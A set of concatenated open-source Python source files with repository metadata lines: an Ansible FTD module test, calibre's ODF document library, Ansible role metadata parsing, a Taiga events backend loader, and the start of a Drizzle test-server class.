resource_mock.side_effect = FtdConfigurationError(msg)
result = self._run_module_with_fail_json({'operation': operation_name})
assert result['failed']
assert 'Failed to execute %s operation because of the configuration error: %s' % (operation_name, msg) == \
result['msg']
def test_module_should_fail_when_ftd_server_error(self, resource_mock):
operation_name = 'test name'
code = 500
response = {'error': 'foo'}
resource_mock.side_effect = FtdServerError(response, code)
result = self._run_module_with_fail_json({'operation': operation_name})
assert result['failed']
assert 'Server returned an error trying to execute %s operation. Status code: %s. ' \
'Server response: %s' % (operation_name, code, response) == \
result['msg']
def test_module_should_fail_when_validation_error(self, resource_mock):
operation_name = 'test name'
msg = 'Foo error.'
resource_mock.side_effect = ValidationError(msg)
result = self._run_module_with_fail_json({'operation': operation_name})
assert result['failed']
assert msg == result['msg']
def test_module_should_fail_when_unexpected_server_response(self, resource_mock):
operation_name = 'test name'
msg = 'Foo error.'
resource_mock.side_effect = FtdUnexpectedResponse(msg)
result = self._run_module_with_fail_json({'operation': operation_name})
assert result['failed']
assert msg == result['msg']
def test_module_should_fail_when_check_mode_exception(self, resource_mock):
operation_name = 'test name'
msg = 'Foo error.'
resource_mock.side_effect = CheckModeException(msg)
result = self._run_module({'operation': operation_name})
assert not result['changed']
def test_module_should_run_successful(self, resource_mock):
operation_name = 'test name'
resource_mock.return_value = 'ok'
result = self._run_module({'operation': operation_name})
assert result['response'] == 'ok'
def _run_module(self, module_args):
set_module_args(module_args)
with pytest.raises(AnsibleExitJson) as ex:
self.module.main()
return ex.value.args[0]
def _run_module_with_fail_json(self, module_args):
set_module_args(module_args)
with pytest.raises(AnsibleFailJson) as exc:
self.module.main()
result = exc.value.args[0]
return result
| Jorge-Rodriguez/ansible | test/units/modules/network/ftd/test_ftd_configuration.py | Python | gpl-3.0 | 5,145 |
# -*- coding: utf-8 -*-
# Copyright (C) 2006-2010 Søren Roug, European Environment Agency
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Contributor(s):
#
__doc__="""Use OpenDocument to generate your documents."""
import zipfile, time, sys, mimetypes, copy
from cStringIO import StringIO
from namespaces import *
import manifest, meta
from office import *
import element
from attrconverters import make_NCName
from xml.sax.xmlreader import InputSource
from odfmanifest import manifestlist
__version__= TOOLSVERSION
_XMLPROLOGUE = u"<?xml version='1.0' encoding='UTF-8'?>\n"
UNIXPERMS = 0100644 << 16L # -rw-r--r--
IS_FILENAME = 0
IS_IMAGE = 1
# We need at least Python 2.2
assert sys.version_info[0]>=2 and sys.version_info[1] >= 2
#sys.setrecursionlimit(100)
#The recursion limit is set conservative so mistakes like
# s=content() s.addElement(s) won't eat up too much processor time.
odmimetypes = {
'application/vnd.oasis.opendocument.text': '.odt',
'application/vnd.oasis.opendocument.text-template': '.ott',
'application/vnd.oasis.opendocument.graphics': '.odg',
'application/vnd.oasis.opendocument.graphics-template': '.otg',
'application/vnd.oasis.opendocument.presentation': '.odp',
'application/vnd.oasis.opendocument.presentation-template': '.otp',
'application/vnd.oasis.opendocument.spreadsheet': '.ods',
'application/vnd.oasis.opendocument.spreadsheet-template': '.ots',
'application/vnd.oasis.opendocument.chart': '.odc',
'application/vnd.oasis.opendocument.chart-template': '.otc',
'application/vnd.oasis.opendocument.image': '.odi',
'application/vnd.oasis.opendocument.image-template': '.oti',
'application/vnd.oasis.opendocument.formula': '.odf',
'application/vnd.oasis.opendocument.formula-template': '.otf',
'application/vnd.oasis.opendocument.text-master': '.odm',
'application/vnd.oasis.opendocument.text-web': '.oth',
}
class OpaqueObject:
def __init__(self, filename, mediatype, content=None):
self.mediatype = mediatype
self.filename = filename
self.content = content
class OpenDocument:
""" A class to hold the content of an OpenDocument document
Use the xml method to write the XML
source to the screen or to a file
d = OpenDocument(mimetype)
fd.write(d.xml())
"""
thumbnail = None
def __init__(self, mimetype, add_generator=True):
self.mimetype = mimetype
self.childobjects = []
self._extra = []
self.folder = "" # Always empty for toplevel documents
self.topnode = Document(mimetype=self.mimetype)
self.topnode.ownerDocument = self
self.clear_caches()
self.Pictures = {}
self.meta = Meta()
self.topnode.addElement(self.meta)
if add_generator:
self.meta.addElement(meta.Generator(text=TOOLSVERSION))
self.scripts = Scripts()
self.topnode.addElement(self.scripts)
self.fontfacedecls = FontFaceDecls()
self.topnode.addElement(self.fontfacedecls)
self.settings = Settings()
self.topnode.addElement(self.settings)
self.styles = Styles()
self.topnode.addElement(self.styles)
self.automaticstyles = AutomaticStyles()
self.topnode.addElement(self.automaticstyles)
self.masterstyles = MasterStyles()
self.topnode.addElement(self.masterstyles)
self.body = Body()
self.topnode.addElement(self.body)
def rebuild_caches(self, node=None):
if node is None: node = self.topnode
self.build_caches(node)
for e in node.childNodes:
if e.nodeType == element.Node.ELEMENT_NODE:
self.rebuild_caches(e)
def clear_caches(self):
self.element_dict = {}
self._styles_dict = {}
self._styles_ooo_fix = {}
def build_caches(self, element):
""" Called from element.py
"""
if not self.element_dict.has_key(element.qname):
self.element_dict[element.qname] = []
self.element_dict[element.qname].append(element)
if element.qname == (STYLENS, u'style'):
self.__register_stylename(element) # Add to style dictionary
styleref = element.getAttrNS(TEXTNS,u'style-name')
if styleref is not None and self._styles_ooo_fix.has_key(styleref):
element.setAttrNS(TEXTNS,u'style-name', self._styles_ooo_fix[styleref])
def __register_stylename(self, element):
''' Register a style. But there are three style dictionaries:
office:styles, office:automatic-styles and office:master-styles
Chapter 14
'''
name = element.getAttrNS(STYLENS, u'name')
if name is None:
return
if element.parentNode.qname in ((OFFICENS,u'styles'), (OFFICENS,u'automatic-styles')):
if self._styles_dict.has_key(name):
newname = 'M'+name # Rename style
self._styles_ooo_fix[name] = newname
# From here on all references to the old name will refer to the new one
name = newname
element.setAttrNS(STYLENS, u'name', name)
self._styles_dict[name] = element
def toXml(self, filename=''):
xml=StringIO()
xml.write(_XMLPROLOGUE)
self.body.toXml(0, xml)
if not filename:
return xml.getvalue()
else:
f=file(filename,'w')
f.write(xml.getvalue())
f.close()
def xml(self):
""" Generates the full document as an XML file
Always written as a bytestream in UTF-8 encoding
"""
self.__replaceGenerator()
xml=StringIO()
xml.write(_XMLPROLOGUE)
self.topnode.toXml(0, xml)
return xml.getvalue()
def contentxml(self):
""" Generates the content.xml file
Always written as a bytestream in UTF-8 encoding
"""
xml=StringIO()
xml.write(_XMLPROLOGUE)
x = DocumentContent()
x.write_open_tag(0, xml)
if self.scripts.hasChildNodes():
self.scripts.toXml(1, xml)
if self.fontfacedecls.hasChildNodes():
self.fontfacedecls.toXml(1, xml)
a = AutomaticStyles()
stylelist = self._used_auto_styles([self.styles, self.automaticstyles, self.body])
if len(stylelist) > 0:
a.write_open_tag(1, xml)
for s in stylelist:
s.toXml(2, xml)
a.write_close_tag(1, xml)
else:
a.toXml(1, xml)
self.body.toXml(1, xml)
x.write_close_tag(0, xml)
return xml.getvalue()
def __manifestxml(self):
""" Generates the manifest.xml file
The self.manifest isn't avaible unless the document is being saved
"""
xml=StringIO()
xml.write(_XMLPROLOGUE)
self.manifest.toXml(0,xml)
return xml.getvalue()
def metaxml(self):
""" Generates the meta.xml file """
self.__replaceGenerator()
x = DocumentMeta()
x.addElement(self.meta)
xml=StringIO()
xml.write(_XMLPROLOGUE)
x.toXml(0,xml)
return xml.getvalue()
def settingsxml(self):
""" Generates the settings.xml file """
x = DocumentSettings()
x.addElement(self.settings)
xml=StringIO()
xml.write(_XMLPROLOGUE)
x.toXml(0,xml)
return xml.getvalue()
def _parseoneelement(self, top, stylenamelist):
""" Finds references to style objects in master-styles
and add the style name to the style list if not already there.
Recursive
"""
for e in top.childNodes:
if e.nodeType == element.Node.ELEMENT_NODE:
for styleref in (
(CHARTNS,u'style-name'),
(DRAWNS,u'style-name'),
(DRAWNS,u'text-style-name'),
(PRESENTATIONNS,u'style-name'),
(STYLENS,u'data-style-name'),
(STYLENS,u'list-style-name'),
(STYLENS,u'page-layout-name'),
(STYLENS,u'style-name'),
(TABLENS,u'default-cell-style-name'),
(TABLENS,u'style-name'),
(TEXTNS,u'style-name') ):
if e.getAttrNS(styleref[0],styleref[1]):
stylename = e.getAttrNS(styleref[0],styleref[1])
if stylename not in stylenamelist:
stylenamelist.append(stylename)
stylenamelist = self._parseoneelement(e, stylenamelist)
return stylenamelist
def _used_auto_styles(self, segments):
""" Loop through the masterstyles elements, and find the automatic
styles that are used. These will be added to the automatic-styles
element in styles.xml
"""
stylenamelist = []
for top in segments:
stylenamelist = self._parseoneelement(top, stylenamelist)
stylelist = []
for e in self.automaticstyles.childNodes:
if e.getAttrNS(STYLENS,u'name') in stylenamelist:
stylelist.append(e)
return stylelist
def stylesxml(self):
""" Generates the styles.xml file """
xml=StringIO()
xml.write(_XMLPROLOGUE)
x = DocumentStyles()
x.write_open_tag(0, xml)
if self.fontfacedecls.hasChildNodes():
self.fontfacedecls.toXml(1, xml)
self.styles.toXml(1, xml)
a = AutomaticStyles()
a.write_open_tag(1, xml)
for s in self._used_auto_styles([self.masterstyles]):
s.toXml(2, xml)
a.write_close_tag(1, xml)
if self.masterstyles.hasChildNodes():
self.masterstyles.toXml(1, xml)
x.write_close_tag(0, xml)
return xml.getvalue()
def addPicture(self, filename, mediatype=None, content=None):
""" Add a picture
It uses the same convention as OOo, in that it saves the picture in
the zipfile in the subdirectory 'Pictures'
If passed a file ptr, mediatype must be set
"""
if content is None:
if mediatype is None:
mediatype, encoding = mimetypes.guess_type(filename)
if mediatype is None:
mediatype = ''
try: ext = filename[filename.rindex('.'):]
except: ext=''
else:
ext = mimetypes.guess_extension(mediatype)
manifestfn = "Pictures/%0.0f%s" % ((time.time()*10000000000), ext)
self.Pictures[manifestfn] = (IS_FILENAME, filename, mediatype)
else:
manifestfn = filename
self.Pictures[manifestfn] = (IS_IMAGE, content, mediatype)
return manifestfn
def addPictureFromFile(self, filename, mediatype=None):
""" Add a picture
It uses the same convention as OOo, in that it saves the picture in
the zipfile in the subdirectory 'Pictures'.
If mediatype is not given, it will be guessed from the filename
extension.
"""
if mediatype is None:
mediatype, encoding = mimetypes.guess_type(filename)
if mediatype is None:
mediatype = ''
try: ext = filename[filename.rindex('.'):]
except ValueError: ext=''
else:
ext = mimetypes.guess_extension(mediatype)
manifestfn = "Pictures/%0.0f%s" % ((time.time()*10000000000), ext)
self.Pictures[manifestfn] = (IS_FILENAME, filename, mediatype)
return manifestfn
def addPictureFromString(self, content, mediatype):
""" Add a picture
It uses the same convention as OOo, in that it saves the picture in
the zipfile in the subdirectory 'Pictures'. The content variable
is a string that contains the binary image data. The mediatype
indicates the image format.
"""
ext = mimetypes.guess_extension(mediatype)
manifestfn = "Pictures/%0.0f%s" % ((time.time()*10000000000), ext)
self.Pictures[manifestfn] = (IS_IMAGE, content, mediatype)
return manifestfn
def addThumbnail(self, filecontent=None):
""" Add a fixed thumbnail
The thumbnail in the library is big, so this is pretty useless.
"""
if filecontent is None:
import thumbnail
self.thumbnail = thumbnail.thumbnail()
else:
self.thumbnail = filecontent
def addObject(self, document, objectname=None):
""" Adds an object (subdocument). The object must be an OpenDocument class
The return value will be the folder in the zipfile the object is stored in
"""
self.childobjects.append(document)
if objectname is None:
document.folder = "%s/Object %d" % (self.folder, len(self.childobjects))
else:
document.folder = objectname
return ".%s" % document.folder
def _savePictures(self, object, folder):
hasPictures = False
for arcname, picturerec in object.Pictures.items():
what_it_is, fileobj, mediatype = picturerec
self.manifest.addElement(manifest.FileEntry(fullpath="%s%s" % ( folder ,arcname), mediatype=mediatype))
hasPictures = True
if what_it_is == IS_FILENAME:
self._z.write(fileobj, arcname, zipfile.ZIP_STORED)
else:
zi = zipfile.ZipInfo(str(arcname), self._now)
zi.compress_type = zipfile.ZIP_STORED
zi.external_attr = UNIXPERMS
self._z.writestr(zi, fileobj)
# According to section 17.7.3 in ODF 1.1, the pictures folder should not have a manifest entry
# if hasPictures:
# self.manifest.addElement(manifest.FileEntry(fullpath="%sPictures/" % folder, mediatype=""))
# Look in subobjects
subobjectnum = 1
for subobject in object.childobjects:
self._savePictures(subobject,'%sObject %d/' % (folder, subobjectnum))
subobjectnum += 1
def __replaceGenerator(self):
""" Section 3.1.1: The application MUST NOT export the original identifier
belonging to the application that created the document.
"""
for m in self.meta.childNodes[:]:
if m.qname == (METANS, u'generator'):
self.meta.removeChild(m)
self.meta.addElement(meta.Generator(text=TOOLSVERSION))
def save(self, outputfile, addsuffix=False):
""" Save the document under the filename.
If the filename is '-' then save to stdout
"""
if outputfile == '-':
outputfp = zipfile.ZipFile(sys.stdout,"w")
else:
if addsuffix:
outputfile = outputfile + odmimetypes.get(self.mimetype,'.xxx')
outputfp = zipfile.ZipFile(outputfile, "w")
self.__zipwrite(outputfp)
outputfp.close()
def write(self, outputfp):
""" User API to write the ODF file to an open file descriptor
Writes the ZIP format
"""
zipoutputfp = zipfile.ZipFile(outputfp,"w")
self.__zipwrite(zipoutputfp)
def __zipwrite(self, outputfp):
""" Write the document to an open file pointer
This is where the real work is done
"""
self._z = outputfp
self._now = time.localtime()[:6]
self.manifest = manifest.Manifest()
# Write mimetype
zi = zipfile.ZipInfo('mimetype', self._now)
zi.compress_type = zipfile.ZIP_STORED
zi.external_attr = UNIXPERMS
self._z.writestr(zi, self.mimetype)
self._saveXmlObjects(self,"")
# Write pictures
self._savePictures(self,"")
# Write the thumbnail
if self.thumbnail is not None:
self.manifest.addElement(manifest.FileEntry(fullpath="Thumbnails/", mediatype=''))
self.manifest.addElement(manifest.FileEntry(fullpath="Thumbnails/thumbnail.png", mediatype=''))
zi = zipfile.ZipInfo("Thumbnails/thumbnail.png", self._now)
zi.compress_type = zipfile.ZIP_DEFLATED
zi.external_attr = UNIXPERMS
self._z.writestr(zi, self.thumbnail)
# Write any extra files
for op in self._extra:
if op.filename == "META-INF/documentsignatures.xml": continue # Don't save signatures
self.manifest.addElement(manifest.FileEntry(fullpath=op.filename, mediatype=op.mediatype))
zi = zipfile.ZipInfo(op.filename.encode('utf-8'), self._now)
zi.compress_type = zipfile.ZIP_DEFLATED
zi.external_attr = UNIXPERMS
if op.content is not None:
self._z.writestr(zi, op.content)
# Write manifest
zi = zipfile.ZipInfo("META-INF/manifest.xml", self._now)
zi.compress_type = zipfile.ZIP_DEFLATED
zi.external_attr = UNIXPERMS
self._z.writestr(zi, self.__manifestxml() )
del self._z
del self._now
del self.manifest
def _saveXmlObjects(self, object, folder):
if self == object:
self.manifest.addElement(manifest.FileEntry(fullpath="/", mediatype=object.mimetype))
else:
self.manifest.addElement(manifest.FileEntry(fullpath=folder, mediatype=object.mimetype))
# Write styles
self.manifest.addElement(manifest.FileEntry(fullpath="%sstyles.xml" % folder, mediatype="text/xml"))
zi = zipfile.ZipInfo("%sstyles.xml" % folder, self._now)
zi.compress_type = zipfile.ZIP_DEFLATED
zi.external_attr = UNIXPERMS
self._z.writestr(zi, object.stylesxml() )
# Write content
self.manifest.addElement(manifest.FileEntry(fullpath="%scontent.xml" % folder, mediatype="text/xml"))
zi = zipfile.ZipInfo("%scontent.xml" % folder, self._now)
zi.compress_type = zipfile.ZIP_DEFLATED
zi.external_attr = UNIXPERMS
self._z.writestr(zi, object.contentxml() )
# Write settings
if object.settings.hasChildNodes():
self.manifest.addElement(manifest.FileEntry(fullpath="%ssettings.xml" % folder, mediatype="text/xml"))
zi = zipfile.ZipInfo("%ssettings.xml" % folder, self._now)
zi.compress_type = zipfile.ZIP_DEFLATED
zi.external_attr = UNIXPERMS
self._z.writestr(zi, object.settingsxml() )
# Write meta
if self == object:
self.manifest.addElement(manifest.FileEntry(fullpath="meta.xml", mediatype="text/xml"))
zi = zipfile.ZipInfo("meta.xml", self._now)
zi.compress_type = zipfile.ZIP_DEFLATED
zi.external_attr = UNIXPERMS
self._z.writestr(zi, object.metaxml() )
# Write subobjects
subobjectnum = 1
for subobject in object.childobjects:
self._saveXmlObjects(subobject, '%sObject %d/' % (folder, subobjectnum))
subobjectnum += 1
# Document's DOM methods
def createElement(self, element):
""" Inconvenient interface to create an element, but follows XML-DOM.
Does not allow attributes as argument, therefore can't check grammar.
"""
return element(check_grammar=False)
def createTextNode(self, data):
""" Method to create a text node """
return element.Text(data)
def createCDATASection(self, data):
""" Method to create a CDATA section """
return element.CDATASection(cdata)
def getMediaType(self):
""" Returns the media type """
return self.mimetype
def getStyleByName(self, name):
""" Finds a style object based on the name """
ncname = make_NCName(name)
if self._styles_dict == {}:
self.rebuild_caches()
return self._styles_dict.get(ncname, None)
def getElementsByType(self, element):
""" Gets elements based on the type, which is function from text.py, draw.py etc. """
obj = element(check_grammar=False)
if self.element_dict == {}:
self.rebuild_caches()
return self.element_dict.get(obj.qname, [])
# Convenience functions
def OpenDocumentChart():
""" Creates a chart document """
doc = OpenDocument('application/vnd.oasis.opendocument.chart')
doc.chart = Chart()
doc.body.addElement(doc.chart)
return doc
def OpenDocumentDrawing():
""" Creates a drawing document """
doc = OpenDocument('application/vnd.oasis.opendocument.graphics')
doc.drawing = Drawing()
doc.body.addElement(doc.drawing)
return doc
def OpenDocumentImage():
""" Creates an image document """
doc = OpenDocument('application/vnd.oasis.opendocument.image')
doc.image = Image()
doc.body.addElement(doc.image)
return doc
def OpenDocumentPresentation():
""" Creates a presentation document """
doc = OpenDocument('application/vnd.oasis.opendocument.presentation')
doc.presentation = Presentation()
doc.body.addElement(doc.presentation)
return doc
def OpenDocumentSpreadsheet():
""" Creates a spreadsheet document """
doc = OpenDocument('application/vnd.oasis.opendocument.spreadsheet')
doc.spreadsheet = Spreadsheet()
doc.body.addElement(doc.spreadsheet)
return doc
def OpenDocumentText():
""" Creates a text document """
doc = OpenDocument('application/vnd.oasis.opendocument.text')
doc.text = Text()
doc.body.addElement(doc.text)
return doc
def OpenDocumentTextMaster():
""" Creates a text master document """
doc = OpenDocument('application/vnd.oasis.opendocument.text-master')
doc.text = Text()
doc.body.addElement(doc.text)
return doc
def __loadxmlparts(z, manifest, doc, objectpath):
from load import LoadParser
from xml.sax import make_parser, handler
for xmlfile in (objectpath+'settings.xml', objectpath+'meta.xml', objectpath+'content.xml', objectpath+'styles.xml'):
if not manifest.has_key(xmlfile):
continue
try:
xmlpart = z.read(xmlfile)
doc._parsing = xmlfile
parser = make_parser()
parser.setFeature(handler.feature_namespaces, 1)
parser.setContentHandler(LoadParser(doc))
parser.setErrorHandler(handler.ErrorHandler())
inpsrc = InputSource()
inpsrc.setByteStream(StringIO(xmlpart))
parser.setFeature(handler.feature_external_ges, False) # Changed by Kovid to ignore external DTDs
parser.parse(inpsrc)
del doc._parsing
except KeyError, v: pass
def load(odffile):
""" Load an ODF file into memory
Returns a reference to the structure
"""
z = zipfile.ZipFile(odffile)
try:
mimetype = z.read('mimetype')
except KeyError: # Added by Kovid to handle malformed odt files
mimetype = 'application/vnd.oasis.opendocument.text'
doc = OpenDocument(mimetype, add_generator=False)
# Look in the manifest file to see if which of the four files there are
manifestpart = z.read('META-INF/manifest.xml')
manifest = manifestlist(manifestpart)
__loadxmlparts(z, manifest, doc, '')
for mentry,mvalue in manifest.items():
if mentry[:9] == "Pictures/" and len(mentry) > 9:
doc.addPicture(mvalue['full-path'], mvalue['media-type'], z.read(mentry))
elif mentry == "Thumbnails/thumbnail.png":
doc.addThumbnail(z.read(mentry))
elif mentry in ('settings.xml', 'meta.xml', 'content.xml', 'styles.xml'):
pass
# Load subobjects into structure
elif mentry[:7] == "Object " and len(mentry) < 11 and mentry[-1] == "/":
subdoc = OpenDocument(mvalue['media-type'], add_generator=False)
doc.addObject(subdoc, "/" + mentry[:-1])
__loadxmlparts(z, manifest, subdoc, mentry)
elif mentry[:7] == "Object ":
pass # Don't load subobjects as opaque objects
else:
if mvalue['full-path'][-1] == '/':
doc._extra.append(OpaqueObject(mvalue['full-path'], mvalue['media-type'], None))
else:
doc._extra.append(OpaqueObject(mvalue['full-path'], mvalue['media-type'], z.read(mentry)))
# Add the SUN junk here to the struct somewhere
# It is cached data, so it can be out-of-date
z.close()
b = doc.getElementsByType(Body)
if mimetype[:39] == 'application/vnd.oasis.opendocument.text':
doc.text = b[0].firstChild
elif mimetype[:43] == 'application/vnd.oasis.opendocument.graphics':
doc.graphics = b[0].firstChild
elif mimetype[:47] == 'application/vnd.oasis.opendocument.presentation':
doc.presentation = b[0].firstChild
elif mimetype[:46] == 'application/vnd.oasis.opendocument.spreadsheet':
doc.spreadsheet = b[0].firstChild
elif mimetype[:40] == 'application/vnd.oasis.opendocument.chart':
doc.chart = b[0].firstChild
elif mimetype[:40] == 'application/vnd.oasis.opendocument.image':
doc.image = b[0].firstChild
elif mimetype[:42] == 'application/vnd.oasis.opendocument.formula':
doc.formula = b[0].firstChild
return doc
# vim: set expandtab sw=4 :
| ashang/calibre | src/odf/opendocument.py | Python | gpl-3.0 | 26,274 |
# (c) 2014 Michael DeHaan, <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
from ansible.errors import AnsibleParserError, AnsibleError
from ansible.module_utils._text import to_native
from ansible.module_utils.six import iteritems, string_types
from ansible.playbook.attribute import Attribute, FieldAttribute
from ansible.playbook.base import Base
from ansible.playbook.helpers import load_list_of_roles
from ansible.playbook.role.include import RoleInclude
from ansible.playbook.role.requirement import RoleRequirement
__all__ = ['RoleMetadata']
class RoleMetadata(Base):
'''
This class wraps the parsing and validation of the optional metadata
within each Role (meta/main.yml).
'''
_allow_duplicates = FieldAttribute(isa='bool', default=False)
_dependencies = FieldAttribute(isa='list', default=list)
_galaxy_info = FieldAttribute(isa='GalaxyInfo')
def __init__(self, owner=None):
self._owner = owner
super(RoleMetadata, self).__init__()
@staticmethod
def load(data, owner, variable_manager=None, loader=None):
'''
Returns a new RoleMetadata object based on the datastructure passed in.
'''
if not isinstance(data, dict):
raise AnsibleParserError("the 'meta/main.yml' for role %s is not a dictionary" % owner.get_name())
m = RoleMetadata(owner=owner).load_data(data, variable_manager=variable_manager, loader=loader)
return m
def _load_dependencies(self, attr, ds):
'''
This is a helper loading function for the dependencies list,
which returns a list of RoleInclude objects
'''
roles = []
if ds:
if not isinstance(ds, list):
raise AnsibleParserError("Expected role dependencies to be a list.", obj=self._ds)
for role_def in ds:
if isinstance(role_def, string_types) or 'role' in role_def or 'name' in role_def:
roles.append(role_def)
continue
try:
# role_def is new style: { src: 'galaxy.role,version,name', other_vars: "here" }
def_parsed = RoleRequirement.role_yaml_parse(role_def)
if def_parsed.get('name'):
role_def['name'] = def_parsed['name']
roles.append(role_def)
except AnsibleError as exc:
raise AnsibleParserError(to_native(exc), obj=role_def, orig_exc=exc)
current_role_path = None
if self._owner:
current_role_path = os.path.dirname(self._owner._role_path)
try:
return load_list_of_roles(roles, play=self._owner._play, current_role_path=current_role_path, variable_manager=self._variable_manager,
loader=self._loader)
except AssertionError as e:
raise AnsibleParserError("A malformed list of role dependencies was encountered.", obj=self._ds, orig_exc=e)
def _load_galaxy_info(self, attr, ds):
'''
This is a helper loading function for the galaxy info entry
in the metadata, which returns a GalaxyInfo object rather than
a simple dictionary.
'''
return ds
def serialize(self):
return dict(
allow_duplicates=self._allow_duplicates,
dependencies=self._dependencies,
)
def deserialize(self, data):
setattr(self, 'allow_duplicates', data.get('allow_duplicates', False))
setattr(self, 'dependencies', data.get('dependencies', []))
| andmos/ansible | lib/ansible/playbook/role/metadata.py | Python | gpl-3.0 | 4,362 |
# Copyright (C) 2014 Andrey Antukh <[email protected]>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import abc
import importlib
from django.core.exceptions import ImproperlyConfigured
from django.conf import settings
class BaseEventsPushBackend(object, metaclass=abc.ABCMeta):
@abc.abstractmethod
def emit_event(self, message:str, *, routing_key:str, channel:str="events"):
pass
def load_class(path):
"""
Load class from path.
"""
mod_name, klass_name = path.rsplit('.', 1)
try:
mod = importlib.import_module(mod_name)
except AttributeError as e:
raise ImproperlyConfigured('Error importing {0}: "{1}"'.format(mod_name, e))
try:
klass = getattr(mod, klass_name)
except AttributeError:
raise ImproperlyConfigured('Module "{0}" does not define a "{1}" class'.format(mod_name, klass_name))
return klass
def get_events_backend(path:str=None, options:dict=None):
if path is None:
path = getattr(settings, "EVENTS_PUSH_BACKEND", None)
if path is None:
raise ImproperlyConfigured("Events push system not configured")
if options is None:
options = getattr(settings, "EVENTS_PUSH_BACKEND_OPTIONS", {})
cls = load_class(path)
return cls(**options)
| WALR/taiga-back | taiga/events/backends/base.py | Python | agpl-3.0 | 1,894 |
#! /usr/bin/env python
# -*- mode: python; indent-tabs-mode: nil; -*-
# vim:expandtab:shiftwidth=2:tabstop=2:smarttab:
#
# Copyright (C) 2010,2011 Patrick Crews
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
""" drizzled.py: code to allow a serverManager
to provision and start up a drizzled server object
for test execution
"""
# imports
import os
from lib.server_mgmt.server import Server
class drizzleServer(Server):
""" represents a drizzle server, its possessions
(datadir, ports, etc), and methods for controlling
and querying it
TODO: create a base server class that contains
standard methods from which we can inherit
Currently there are definitely methods / attr
which are general
"""
def __init__( self, name, server_manager, code_tree, default_storage_engine
, server_options, requester, test_executor, workdir_root):
super(drizzleServer, self).__init__( name
, server_manager
, code_tree
, default_storage_engine
, server_options
, requester
, test_executor
, workdir_root)
self.preferred_base_port = 9306
# client files
self.drizzledump = self.code_tree.drizzledump
self.drizzle_client = self.code_tree.drizzle_client
self.drizzleimport = self.code_tree.drizzleimport
self.drizzleslap = self.code_tree.drizzleslap
self.server_path = self.code_tree.drizzle_server
self.drizzle_client_path = self.code_tree.drizzle_client
self.schemawriter = self.code_tree.schemawriter
self.trx_reader = self.code_tree.trx_reader
# Get our ports
self.port_block = self.system_manager.port_manager.get_port_block( self.name
, self.preferred_base_port
, 6 )
self.master_port = self.port_block[0]
self.drizzle_tcp_port = self.port_block[1]
self.mc_port = self.port_block[2]
self.pbms_port = self.port_block[3]
self.rabbitmq_node_port = self.port_block[4]
self.json_server_port = self.port_block[5]
# Generate our working directories
self.dirset = {'var_%s' %(self.name): {'std_data_ln':( os.path.join(self.code_tree.testdir,'std_data'))
,'log':None
,'run':None
,'tmp':None
,'master-data': {'local': { 'test':None
, 'mysql':None
}
}
}
}
self.workdir = self.system_manager.create_dirset( workdir_root
, self.dirset)
self.vardir = self.workdir
self.tmpdir = os.path.join(self.vardir,'tmp')
self.rundir = os.path.join(self.vardir,'run')
self.logdir = os.path.join(self.vardir,'log')
self.datadir = os.path.join(self.vardir,'master-data')
self.error_log = os.path.join(self.logdir,'error.log')
self.pid_file = os.path.join(self.rundir,('%s.pid' %(self.name)))
self.socket_file = os.path.join(self.vardir, ('%s.sock' %(self.name)))
if len(self.socket_file) > 107:
# MySQL has a limitation of 107 characters for socket file path
# we copy the mtr workaround of creating one in /tmp
self.logging.verbose("Default socket file path: %s" %(self.socket_file))
self.socket_file = "/tmp/%s_%s.%s.sock" %(self.system_manager.uuid
,self.owner
,self.name)
self.logging.verbose("Changing to alternate: %s" %(self.socket_file))
self.timer_file = os.path.join(self.logdir,('timer'))
# Do magic to create a config file for use with the slave
# plugin
self.slave_config_file = os.path.join(self.logdir,'slave.cnf')
self.create_slave_config_file()
self.snapshot_path = os.path.join(self.tmpdir,('snapshot_%s' %(self.master_port)))
# We want to use --secure-file-priv = $vardir by default
# but there are times / tools when we need to shut this off
if self.no_secure_file_priv:
self.secure_file_string = ''
else:
self.secure_file_string = "--secure-file-priv='%s'" %(self.vardir)
self.user_string = '--user=root'
self.initialize_databases()
self.take_db_snapshot()
self.logging.debug_class(self)
def report(self):
""" We print out some general useful info """
report_values = [ 'name'
, 'master_port'
, 'drizzle_tcp_port'
, 'mc_port'
, 'pbms_port'
, 'rabbitmq_node_port'
, 'vardir'
, 'status'
]
self.logging.info("%s server:" %(self.owner))
for key in report_values:
value = vars(self)[key]
self.logging.info("%s: %s" %(key.upper(), value))
def get_start_cmd(self):
""" Return the command string that will start up the server
as desired / intended
"""
server_args = [ self.process_server_options()
, "--mysql-protocol.port=%d" %(self.master_port)
, "--mysql-protocol.connect-timeout=60"
